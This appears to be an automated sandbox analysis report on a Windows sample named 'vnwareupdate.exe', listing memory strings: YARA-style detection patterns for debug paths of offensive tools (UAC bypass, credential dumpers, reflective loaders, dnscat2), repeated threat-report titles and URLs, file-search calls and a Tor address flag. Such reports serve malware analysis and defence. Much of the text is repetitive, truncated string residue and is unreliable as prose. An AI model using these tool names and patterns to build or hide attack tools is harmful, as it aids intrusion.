https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cStrider: Cyberespionage group turns eye of Sauron on targets http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauStrider: Cyberespionage group turns eye of Sauron on targets http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sau source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD9Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $s0 = "\\Release\\AppInitHook_RID2B57.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\inject.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "bin\\oSaberSvc.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "ipsearcher_RID2B37\\ipsearcher_RID2B37\\Release\\ipsearcher_RID2B37.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\x64\\x64passldr.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x5 = "Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDbBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\reflective_dll.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Release\\Myrtille.Services.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\Win32Project1\\Release\\Win32Project1.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\Release\\RTLBot.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x7 = "\\obj\\Release\\Potato.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\ClearLog\\Release\\logC.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "\\Release\\PhantomNet-SSL.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\CWoolger.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\Release\\Bot Fresh.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\BypassUacDll.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\Layer.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\kasper.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\amd64\\elrawdsk.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s16 = ".\\lsasrv.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\FTPCom_vs10\\Release\\Engine.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: BlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pd source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\PSAttack.pdb" fullword source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\WindowXarbot.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "\\custact\\x86\\AICustAct.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\WinMain\\Release\\WinMain.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "Excalibur\\bin\\Shell.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\SkeyMan2.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD dBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDoBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD9Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDOBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDcBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDdBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDiBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDOThe Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/4dec74bc41c581b82459;APTnotes 2014 Operation_Poisoned_Hurricane.pdf source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\ReflectivLoader.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\fgexec_RID2983.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x7 = "\\obj\\Release\\botkill.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x6 = "Bot\\Release\\Ism.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\PowerShellRunner.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x5 = "Bot5\\Release\\Ism.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDh source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\instlsp\\Release\\Lancer.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\scout\\Release\\scout.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = /\\Release\\[a-z]{0,8}katz.pdb/ source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "BypassUac.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s5 = "%windows%\\mfc42l00.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\obj\\Release\\TempRacer_RID2A94.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\exploit.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s0 = "\\i386\\Hello.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s6 = "\\obj\\Release\\ZPP.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "uac\\bin\\install_test.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\dnscat2.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "c:\\ntevt.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD5Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDaBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8@ source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\support\\Release\\ab.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\ms11080\\Debug\\ms11080.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405768
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_004062A3 FindFirstFileA,FindClose,	0_2_004062A3
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\	Jump to behavior

Networking:

Found Tor onion address

Show sources

Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: WdSAzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-Double dipping: Diverting ransomware Bitcoin payments via .onion domains https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransoDouble dipping: Diverting ransomware Bitcoin payments via .onion domains https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ranso
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: Double dipping: Diverting ransomware Bitcoin payments via .onion domains https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransoNew version of mobile malware Catelites possibly linked to Cron cyber gang https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-tH %

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $s3 = "www.yahoo.com" fullword ascii equals www.yahoo.com (Yahoo)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 008DE622CA9526F5F4A1DD3F16F4EA;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 02B03555A505CFCFC4B5F4F716B2BA88ED4CD8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 038A97B4E2F37F34B255F0643E49FC9D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 04738CA02F59A5CD394998A99FCD9613;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 070D7082A5ABE1112615877214EC82241FD17E5BD465E24D794A470F699AF88E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
